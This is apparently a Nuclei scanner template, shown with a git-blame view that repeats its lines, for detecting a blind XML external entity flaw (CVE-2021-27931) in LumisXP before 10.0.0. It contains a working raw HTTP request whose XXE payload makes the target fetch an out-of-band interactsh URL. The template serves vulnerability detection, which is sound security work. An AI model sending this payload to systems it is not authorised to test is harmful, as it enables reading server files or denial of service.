nuclei-templates/http/cves/2021/CVE-2021-27931.yaml

id: CVE-2021-27931

info:
  name: LumisXP <10.0.0 - Blind XML External Entity Attack
  author: alph4byt3
  severity: critical
  description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.
  remediation: |
    Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability.
  reference:
    - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27931
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-27931
    cwe-id: CWE-611
    epss-score: 0.55442
    epss-percentile: 0.97306
    cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lumis
    product: lumis_experience_platform
  tags: cve,cve2021,lumis,xxe,oast,blind

http:
  - raw:
      - |
        POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0" ?>
        <!DOCTYPE r [
        <!ELEMENT r ANY >
        <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <method name="addPage">
        <id>&xxe;</id>
        </method>

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# digest: 4a0a0047304502205dcc6c350d8b26d0d931767e08fd4b7ab3880c66e6bde04fa8764533b72964eb0221009a88edb41e1610aeb7ddc519b7fd23ff455322ac1823ed5a1dcb4e7766a1b54c:922c64590222798bb761d5b6d8e72950
Create CVE-2021-27931.yaml 2021-11-25 15:39:09 +00:00			`id: CVE-2021-27931`

			`info:`
Dashboard Content Enhancements (#4426) Dashboard Content Enhancements 2022-05-18 20:58:07 +00:00			`name: LumisXP <10.0.0 - Blind XML External Entity Attack`
Create CVE-2021-27931.yaml 2021-11-25 15:39:09 +00:00			`author: alph4byt3`
Auto Generated CVE annotations [Fri Dec 3 07:19:34 UTC 2021] :robot: 2021-12-03 07:19:34 +00:00			`severity: critical`
Dashboard Content Enhancements (#4426) Dashboard Content Enhancements 2022-05-18 20:58:07 +00:00			`description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability.`
Create CVE-2021-27931.yaml 2021-11-25 15:39:09 +00:00			`reference:`
			`- https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt`
Update CVE-2021-27931.yaml 2021-12-03 07:18:47 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-27931`
Auto Generated CVE annotations [Fri Dec 3 07:19:34 UTC 2021] :robot: 2021-12-03 07:19:34 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.1`
Auto Generated CVE annotations [Fri Dec 3 07:19:34 UTC 2021] :robot: 2021-12-03 07:19:34 +00:00			`cve-id: CVE-2021-27931`
			`cwe-id: CWE-611`
TemplateMan Update [Sun Oct 22 12:16:23 UTC 2023] :robot: 2023-10-22 12:16:24 +00:00			`epss-score: 0.55442`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`epss-percentile: 0.97306`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:lumis:lumis_experience_platform::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: lumis`
			`product: lumis_experience_platform`
			`tags: cve,cve2021,lumis,xxe,oast,blind`
Create CVE-2021-27931.yaml 2021-11-25 15:39:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-27931.yaml 2021-11-25 15:39:09 +00:00			`- raw:`
			`- \|`
			`POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1`
			`Host: {{Hostname}}`

			`<?xml version="1.0" ?>`
			`<!DOCTYPE r [`
			`<!ELEMENT r ANY >`
			`<!ENTITY xxe SYSTEM "http://{{interactsh-url}}">`
			`]>`
			`<method name="addPage">`
			`<id>&xxe;</id>`
			`</method>`
Update CVE-2021-27931.yaml 2021-12-03 07:18:47 +00:00
Create CVE-2021-27931.yaml 2021-11-25 15:39:09 +00:00			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`
TemplateMan Update [Tue Nov 7 17:58:21 UTC 2023] :robot: 2023-11-07 17:58:22 +00:00
			`# digest: 4a0a0047304502205dcc6c350d8b26d0d931767e08fd4b7ab3880c66e6bde04fa8764533b72964eb0221009a88edb41e1610aeb7ddc519b7fd23ff455322ac1823ed5a1dcb4e7766a1b54c:922c64590222798bb761d5b6d8e72950`